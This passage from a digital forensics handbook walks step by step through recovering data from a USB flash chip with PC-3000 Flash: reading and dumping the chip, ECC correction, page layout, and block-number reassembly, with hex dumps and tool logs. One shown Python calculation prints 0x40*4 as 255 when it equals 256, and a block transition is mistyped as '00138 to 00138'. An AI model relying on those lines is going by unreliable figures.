  • 260. Chapter 12 - Data recovery 253 12.27 - Set controller and number of chips The translation from Russian is not always perfect. The first indication Number of chip should actually be called “Number of chips” because you have to specify the number of chips and not the position of the chip you are going to read. Once set, this information can no longer be adjusted! The specification of the controller is important later to search in the Solution Center for an already known solution… By clicking on Next> you confirm these entries. In the last step, you can enter more information for the case:
  • 261. Chapter 12 - Data recovery 254 12.28 - Set additional informations/notes By clicking OK you create the case and open it immediately: 12.29 - Read the chip ID
  • 262. Chapter 12 - Data recovery 255 In this case, you see only one chip as you stated before. If you had specified a larger number of chips, you would now have several chips in the list that you would need to fill with data. PC-3000 Flash is very context-menu driven. The first step in creating the dump is to read the ID of the chip. Via the ID, PC-3000 Flash recognizes which settings are necessary for reading the chip. To do this, you right-click on 1 – Unknown chip. This brings up the context-menu as shown above. In it you select the entry Read chip ID and then the following dialog appears: 12.30 - Chip ID found The appropriate values have already been set by the adapter you used and usually there is no need to activate further options. The read process starts automatically. All possible modes get tried. If the ID is read successfully, the window disappears. If there are read errors, they are displayed as red lines. There are partial read errors in which some values are found and the full read errors shown below. Not a single value is determined for Chip ID, Parts or Base:
  • 263. Chapter 12 - Data recovery 256 12.31 - Chip ID reading error In this case, you should clean the chip with a scalpel as previously mentioned. If that did not help, the chip is most probably dead and there is no way to recover the data. If the ID is recognized, the chip name changes: 12.32 - Read chip With a right-click you get the context-menu again and then you need to select Read chip to start the first reading pass:
  • 264. Chapter 12 - Data recovery 257 12.33 - Reading mode selection dialog The dialog shown above allows you to select the reading mode. The Direct reading mode is only intended for testing the reading options and should therefore only be used in exceptional cases. Normally you select Reading to file dump to write the data from the chip to a file. Then you confirm this with Select. 12.34 - Reading parameters dialog (normal) In this step, you choose the reading speed and some more settings. You get the advanced settings by clicking on Extended>>:
  • 265. Chapter 12 - Data recovery 258 12.35 - Reading parameters dialog (extended) Here you can already perform some analysis or verification of the data while reading or restart the chip with a power reset after a read error. I’m not a fan of running the analyses while copying the data. Auto-verification may make sense for some chips because the data is read several times and then the most likely result is stored. As a rule, the ECC correction and re-reading works better! A click on Apply starts reading:
  • 266. Chapter 12 - Data recovery 259 12.36 - Reading process running Then you have to correct the data which you just read by performing the ECC correction and, if necessary, re-reading the uncorrectable pages using special re-reading methods. To do this, you open the newly added item Results of preparation in the left pane and then click on the item 0001 Transformation graph. The transformation graph is the area in which you will work from now on. This is where all transformations are carried out with which you go from a physical to a logical image.
  • 267. Chapter 12 - Data recovery 260 To trigger the ECC correction, right-click on entry 0 in the Items column. If you have previously defined two or more chips, you would now see a sub-column with the chip-number (0, 1, …) in Items per chip. Then you would have to perform the ECC correction and re-reading for each chip individually. To start the ECC correction you select Data correction via ECC -> ECC autodetection: 12.37 - Start ECC correction This analysis may take some time depending on the size of the dump. If the ECC data cannot be determined during the fast analysis, you will be asked whether a complete analysis should be performed. Once ECC data is found, you see the following question: 12.38 - ECC data found dialog After clicking the Yes button, you see the following in the Log tab:
  • 268. Chapter 12 - Data recovery 261 >>>>>>>>>>>>>>>>>>> Detect ECC for sector = 528 bytes Check ECC process **************** start time 9/4/2022 4:28:43 PM finish time 9/4/2022 4:28:45 PM ------------------------------------------------------------------ total time 00:00:02 ****************************************************************** The information that a sector is 528 bytes long will be needed later. I suggest to note such things as the log may get very long over time. That’s why I have a notebook and a pen next to each data recovery workstation! Then you can perform the re-reading based on the ECC data. Only pages that could not be corrected during the ECC correction are re-read. To do this, right-click on item 0 and then on Tools -> Read Retry -> ReadRetry mode checking: 12.39 - Find re-reading methods After that, you get a list of possible read retry modes:
  • 269. Chapter 12 - Data recovery 262 12.40 - Re-read method list This list is sorted by probability. Here you can see on the rating of 1% that this very old chip does not support special re-reading commands or that the appropriate commands for this chip are not available in PC-3000 Flash. In such a case, I then check how many sectors are faulty. To do this, right-click again on item 0 and then select the entry Map from the context menu: 12.41 - Start map building Here you see a pictorial representation of all read pages. To see the bad sectors, you click on the down arrow next to ECC in the toolbar and then you select the entry Create submap use ECC info:
  • 270. Chapter 12 - Data recovery 263 12.42 - Start building submap based on ECC info Then you see the following window: 12.43 - Select parameters for submap Here you select Invalid sectors and click OK. Then you get a graphical overview of the bad sectors: 12.44 - Uncorrected sectors In this case, there are only 4 bad sectors or 1 page. In the next step, you have to check with such an old pendrive whether a scrambling of the data has taken place or not. This scrambling can be done in the following three ways:
  • 271. Chapter 12 - Data recovery 264 1. Bitwise inversion 2. XOR 3. Encryption To check whether the data is scrambled, right-click on entry 0 under Items and then select the entry Raw recovery: 12.45 - Start RAW recovery The following window will appear. Here you can initiate the search for files by clicking on the play button in the toolbar. After that, you can look at the data sorted by file type: 12.46 - RAW recovery results Since PC-3000 found some files, there is no scrambling. However, when you open an image, the file is damaged:
  • 272. Chapter 12 - Data recovery 265 12.47 - Image-fragments in wrong order The data is readable but the order of the data is completely wrong because of the wear leveling! Next, look at the entries under FAT folder. This is the data used to define a folder in the FAT filesystem. These entries are usually quite short and could fit into a page. This makes this data ideal for use in the Page Designer. To do this, right-click on the entries in the list and then select Add to search results: 12.48 - Add search results The following dialog appears:
  • 273. Chapter 12 - Data recovery 266 12.49 - Define results ID Confirm the ID with OK. Then everything is ready for splitting the pages into sectors with the page designer. Open the page designer again via the context-menu: 12.50 - Open page designer The following window will appear: 12.51 - Page designer window Here you can see the content of a page in the left pane. To the right, you can define and edit the division of pages into individual sectors. Just below that, you find the previously added search results. As soon as you click on one of the search results, you see the first page in which the data of this file is stored. A page contains a certain number (4, 8, 16, 32, … ) of sectors in the so-called data area (DA) and some
  • 274. Chapter 12 - Data recovery 267 additional bytes. These additional bytes are called the service area (SA) and they contain ECC data and markers. Each page conversion must consist of sectors with 512 bytes in the data area and at least 2 bytes in the service area. So, the smallest possible fragments are 514 bytes per sector. Of course, some data areas can also follow each other directly and the service areas for the individual sectors are located at the end of the page or in one block after 2 or 4 sectors. In addition, one of the service areas can be larger and contain both service data for the sector and the entire page. However, the unequal division of the page into sectors with different service areas of different sizes is rather the exception. As a rule, the service areas of all sectors are the same size! The de-scrambling of the data with XOR depends on the page layout and therefore often no manual page conversion has to be carried out. This is automatically detected after the application of XOR and suggested to the user. Now let’s take a closer look at a page: 0x0000 2E20 2020 2020 2020 2020 2010 0000 4CA1 . ...L¡ 0x0010 B54A B54A 0100 4CA1 B54A 5FAA 0000 0000 µJµJ..L¡µJ_ª.... 0x0020 2E2E 2020 2020 2020 2020 2010 0000 4CA1 .. ...L¡ 0x0030 B54A B54A 0000 4CA1 B54A 0000 0000 0000 µJµJ..L¡µJ...... 0x0040 4174 0061 0072 0067 0065 000F 0068 7400 At.a.r.g.e...ht. 0x0050 2E00 7400 7800 7400 0000 0000 FFFF FFFF ..t.x.t.....ÿÿÿÿ 0x0060 5441 5247 4554 2020 5458 5420 0000 4CA1 TARGET TXT ..L¡ 0x0070 B54A B54A 0100 04A1 B54A 60AA 2300 0000 µJµJ...¡µJ`ª#... 0x0080 416C 006F 0067 0000 00FF FF0F 0000 FFFF Al.o.g...ÿÿ...ÿÿ 0x0090 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ 0x00A0 4C4F 4720 2020 2020 2020 2020 0000 4CA1 LOG ..L¡ 0x00B0 B54A B54A 0100 06A1 B54A 61AA 4518 0000 µJµJ...¡µJaªE... 0x00C0 4265 0000 00FF FFFF FFFF FF0F 0050 FFFF Be...ÿÿÿÿÿÿ..Pÿÿ 0x00D0 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ 0x00E0 0173 0065 0073 0073 0069 000F 0050 6F00 .s.e.s.s.i...Po. 0x00F0 6E00 2E00 7300 7100 6C00 0000 6900 7400 n...s.q.l...i.t. 0x0100 5345 5353 494F 7E31 5351 4C20 0000 4CA1 SESSIO~1SQL ..L¡ 0x0110 B54A B54A 0100 01A1 B54A 63AA 0040 0000 µJµJ...¡µJcª.@.. 0x0120 4164 0075 006D 0070 0000 000F 0068 FFFF Ad.u.m.p.....hÿÿ 0x0130 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ 0x0140 4455 4D50 2020 2020 2020 2010 0000 4CA1 DUMP ...L¡ 0x0150 B54A B54A 0100 4CA1 B54A 67AA 0000 0000 µJµJ..L¡µJgª.... 0x0160 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0170 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0180 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0190 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x01A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
  • 275. Chapter 12 - Data recovery 268 0x01B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x01C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x01D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x01E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x01F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0200 1345 1345 FFFF D30E 4199 E706 F629 8ACD .E.EÿÿÓ.A™ç.ö)ŠÍ 0x0210 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0220 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0230 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0240 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0250 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0260 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0270 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0280 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0290 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x02A0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x02B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x02C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x02D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x02E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x02F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0300 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0310 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0320 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0330 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0340 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0350 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0360 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0370 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0380 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0390 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x03A0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x03B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x03C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x03D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x03E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x03F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0400 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0410 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι 0x0420 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0430 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0440 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0450 0000 0000 0000 0000 0000 0000 0000 0000 ................
  • 276. Chapter 12 - Data recovery 269 0x0460 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0470 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0480 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0490 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x04A0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x04B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x04C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x04D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x04E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x04F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0500 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0510 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0520 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0530 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0540 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0550 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0560 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0570 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0580 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0590 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x05A0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x05B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x05C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x05D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x05E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x05F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0600 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0610 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0620 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι 0x0630 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0640 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0650 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0660 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0670 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0680 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0690 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x06A0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x06B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x06C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x06D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x06E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x06F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0700 0000 0000 0000 0000 0000 0000 0000 0000 ................
  • 277. Chapter 12 - Data recovery 270 0x0710 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0720 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0730 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0740 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0750 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0760 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0770 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0780 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0790 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x07A0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x07B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x07C0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x07D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x07E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x07F0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0800 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0810 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0820 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0830 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι You can see well that after 512 bytes of data there are 16 bytes of service area and you see that there are 4 sectors in a page. These 512 + 16 bytes result in the 528 bytes per sector previously recognized by ECC. To do the split manually, can right-click the Page entry in the Tree tab and use Divide proportionally from the context-menu. This will open the following window: 12.52 - Divide page proportionally Then enter 4 that the page gets divided into 4 sectors and confirm this with Apply. After that the program asks, if you want to allocate the parts to the sectors definition:
  • 278. Chapter 12 - Data recovery 271 12.53 - Add parts to sectors dialog Confirm this with Yes and you get 4 sectors of 528 bytes each… To divide these sectors into data and service area, right-click on the range entry and select Divide from context-menu: 12.54 - Divide sectors in DA and SA Then enter the length of the data area in bytes and confirm this with Apply: 12.55 - Sector length Once you have done this for all sectors, the page conversion looks like this:
  • 279. Chapter 12 - Data recovery 272 12.56 - Finished page conversion A page conversion would not even have been necessary for this example but this rather manageable page conversion was ideal to show the process… Click on the down arrow next to the play button in the toolbar and then on Apply to add the page conversion to the transformation graph 12.57 - Apply page conversion … and the following message appears:
  • 280. Chapter 12 - Data recovery 273 12.58 - Transformation successful messagebox Confirm that with OK and you find in transformation graph another line: 12.59 - Transformation graph with newly added page conversion The transformation graph is basically a list of all the conversion steps that are applied to the dump. In order to get the data in the right order, you have two main options: • Block number in which a part within the service area is used to bring the data in the correct order and the use of a • Translator, which is the newer and more complex method to bring the data in the right order! To see if you are dealing with a block number algorithm, you can look at the service information of all sectors. To do this, you right-click on item 0 in the second line of the transformation graph (Page conversion) and select Service information from the context-menu. After that, you will see the following window:
  • 281. Chapter 12 - Data recovery 274 12.60 - Service informations top sectors Here you see in each line the 16 bytes of the service area of all sectors. Since in a block number algorithm the numbering of the blocks is at the beginning of the service area, you scroll through the data. While the rear data is constantly changing, you only see the value 0x00 on the first 6 bytes. So, I scroll down a little bit further and I see the following: 12.61 - Service informations later sectors Here again the first 6 bytes remain the same and the other 10 bytes are constantly changing.
  • 282. Chapter 12 - Data recovery 275 12.62 - Service informations top sectors A bit further down you see the same picture. If you pay close attention to the transition from block 00138 to 00138, you see that with the block, the first few bytes also change. So, you clearly have a pendrive that works based on one of the block number algorithms. Which exactly, you can determine by research or with the trial-and-error method. You can also use the Solution Center for research. To do so, right-click on the headline Chips in the left pane and select Search solution from the context-menu. The solutions will be searched based on the controller model you entered when creating the case and the ID read from the chip. I want to demonstrate the trial-and-error approach here. To do this, right-click again on the item 0 in the last line in the transformation graph and then select Data analysis -> Block number -> Block number (Type 1) [0x0000]:
  • 283. Chapter 12 - Data recovery 276 12.63 - Try block number 0000 The Type 1 algorithm [0x0000] is usually quite universal and my first choice. Type 2 is for a different controller and Type 4 would be for a Kingston SD card – so you can exclude that in this example. If Type 1 doesn’t fit, you can try Type 5, Type 7 and Type 9 … As soon as you click on the entry for Type 1, you see the following window:
  • 284. Chapter 12 - Data recovery 277 12.64 - Block number type 0000 dialog Here activate the checkbox Autodetect for the first attempt and start the process. Then you see the following output in the log tab: [05.09.2022 11:09:25]: Applying method : Block number (Type 1) [0x0000]... [05.09.2022 11:09:26]: Algorithm parameters autodetection... Block size detection [05.09.2022 11:09:28]: Shift of marker within sector: 512 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234 [05.09.2022 11:09:29]: Shift of marker within sector: 513 Calculated value of block size: 0256 Probability: 318464 Mask: Undefined! Identifier structure: Undefined! V ariant is not correct and removed from analysis [05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234 [05.09.2022 11:09:29]: Variants of marker position:: [05.09.2022 11:09:29]: Shift of marker within sector: 512 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234 [05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234 [05.09.2022 11:09:29]: Try other parameters in case of bad result . [05.09.2022 11:09:29]: The following parameters will be applied: [05.09.2022 11:09:29]: Marker position............. 512 [05.09.2022 11:09:29]: Block Size (in sectors)..... 256 [05.09.2022 11:09:29]: Shift of the analysis start. 0 [05.09.2022 11:09:29]: Mask........................ 0xFFFF
  • 285. Chapter 12 - Data recovery 278 [05.09.2022 11:09:29]: Identifier structure........ 1234 [05.09.2022 11:09:29]: Blocks integrity testing.... No [05.09.2022 11:09:29]: Blocks within the bounds of bank..... NO [05.09.2022 11:09:29]: Page Size................... 8 [05.09.2022 11:09:29]: Sector number for getting marker value(The main passage): 0 [05.09.2022 11:09:29]: Sector number for getting marker value(Additional passage): 0 [05.09.2022 11:09:29]: Direct Image Building NO [05.09.2022 11:09:29]: Skip Block Empty first page YES [05.09.2022 11:09:29]: Special ConditionUse marker from 0 addon NO [05.09.2022 11:09:29]: Marker analysis. Allocation by banks. [05.09.2022 11:09:29]: Bank size 512 -> Value adjusted. [05.09.2022 11:09:29]: Bank 00 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 01 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 02 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 03 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 04 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 05 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 06 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: Bank 07 Block Number D: 000512 H: 0200 [05.09.2022 11:09:29]: ------------------------------------------------------------- --- [05.09.2022 11:09:29]: Shaped banks and boundaries [05.09.2022 11:09:29]: Bank: 000 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000000000 - 000131071 [05.09.2022 11:09:29]: Bank: 001 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000131072 - 000262143 [05.09.2022 11:09:29]: Bank: 002 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000262144 - 000393215 [05.09.2022 11:09:29]: Bank: 003 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000393216 - 000524287 [05.09.2022 11:09:29]: Bank: 004 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000524288 - 000655359 [05.09.2022 11:09:29]: Bank: 005 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000655360 - 000786431 [05.09.2022 11:09:29]: Bank: 006 ( Number of blocks: 00512 (0x 200) )-> Range of sec tors: 000786432 - 000917503 [05.09.2022 11:09:29]: Bank: 007 ( Number of blocks: 00511 (0x 1FF) )-> Range of sec tors: 000917504 - 001048319 [05.09.2022 11:09:29]: ------------------------------------------------------------- --- [05.09.2022 11:09:29]: Partition header is not correct! It's recommended to use Vers ion table and Quick disk analysis [05.09.2022 11:09:29]: Duration : 00:00:04
  • 286. Chapter 12 - Data recovery 279 Sector was read successfully Apparently, the process worked – so check the result: 12.65 - Context-menu -> View first sector You can see here immediately, if you click on the new entry in the Folders pane, that the result does not work. Instead of offering a filesystem, the entry is not extendable! This indicates the wrong block number algorithm or the wrong parameters. Before I try other parameters, I try the other algorithms! If you right-click on the result, you can see with View the first sector that this sector cannot possibly be the MBR:
  • 287. Chapter 12 - Data recovery 280 12.66 - First sector of block number result You don’t have a valid partition table, nothing that looks like a bootloader, and no 0x55AA as MBR signature in the last 2 bytes. You can remove the unusable result of Type 1 with a right-click and the option Delete. After that, I try Type 5 as usual with the Autodetect option first. However, this provides the following error in the log tab: [05.09.2022 11:12:57]: Applying method : Block Number (Type 5) [0x1001]... [05.09.2022 11:12:57]: Autodetection is impossible. Write parameters manually! [2022-09-05 11:13:47]: Duration : 00:00:50 [05.09.2022 11:13:47]: Either errors occurred during recovery, or the process was in terrupted. There is also a messagebox showing you that the process failed, which offers you to delete the failed result right away:
  • 288. Chapter 12 - Data recovery 281 12.67 - Block number algotythm failed message Therefore I call again the dialog for Type 5 and remove the checkmark for Autodetect: 12.68 - Block number type 5 with default values I leave the marker position at 512 bytes. This is also consistent with what you saw in Page designer. For Block size in sectors, I leave the proposed 256 sectors. However, you can easily confirm this by viewing the service information:
  • 289. Chapter 12 - Data recovery 282 12.69 - Service informations Here you see the boundary between block 0 and block 1 (B = block). Block 0 consists of pages 0x00 – 0x3F (P = Pages). With this information you can use the Python shell to calculate: 0x00 until 0x3F are in hexadecimal notation 0x40 pages: >>> 0x40*4 255 So, you have the sectors 0 – 255 in block 0. This confirms the 256 sectors per block. As soon as you use these values to build a virtual block-device with the Apply-button, you see the following messages in the log tab: [05.09.2022 11:14:34]: Applying method : Block Number (Type 5) [0x1001]... [05.09.2022 11:14:35]: The following parameters will be applied: [05.09.2022 11:14:35]: Marker position............. 512 [05.09.2022 11:14:35]: Block Size (in sectors)..... 256 [05.09.2022 11:14:35]: Only even blocks............ No [2022-09-05 11:14:50]: Duration : 00:00:15 This time you can expand the entry for Type 5:
  • 290. Chapter 12 - Data recovery 283 12.70 - Block number type 5 working We can also see based on the green dots that the JPG files are valid based on the structure check of PC-3000. If you want to view one of the images, you can right-click on the filename to open the context- menu and then select the entry Open. Here, the standard program, which is set in Windows for the respective file type, is used to open the file. Of course, you can also back up the data: 12.71 - Save user data To do this, I set the check mark on the folder Root (root directory of the partition). Then I right-click Root in the Folders pane and select Save marked... from the context-menu.
  • 291. Chapter 12 - Data recovery 284 After that, you only have to specify where the data should be stored and start the process. Reading the chips is always the same but there may be times when you need to do the de-scrambling with XOR before the ECC correction. After successfully assembling a virtual block device you can right-click on Block device (Type 5) [0x1001] and select Image to file to create a binary image of the partition which you can load then into a forensics tool of your choice. A flash chip-off case can get easily more complex: 12.71 - Save user data Some cases have even more complex transformations then the one shown above! To get good at this type of data recovery requires time, training and research. This is the reason why I don’t recommend beginners to start with flash data recovery but with HDDs. The success rate even with basic knowledge will be much higher.
  • 292. Errata Reporting Errata If you think you’ve found an error relating to spelling, grammar, or anything else that’s currently holding this book back from being the best it can be, please visit the book’s GitHub repository²⁸² and create an Issue detailing the error you’ve found. Anyone is also welcome to submit a Pull Request with new content, fixes, changes, etc. ²⁸²https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues
  • 293. Changelog • v1.0²⁸³ - August 15, 2022 • v1.1²⁸⁴ - September 10, 2022 ²⁸³https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/ v1.0 ²⁸⁴https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/ v1.1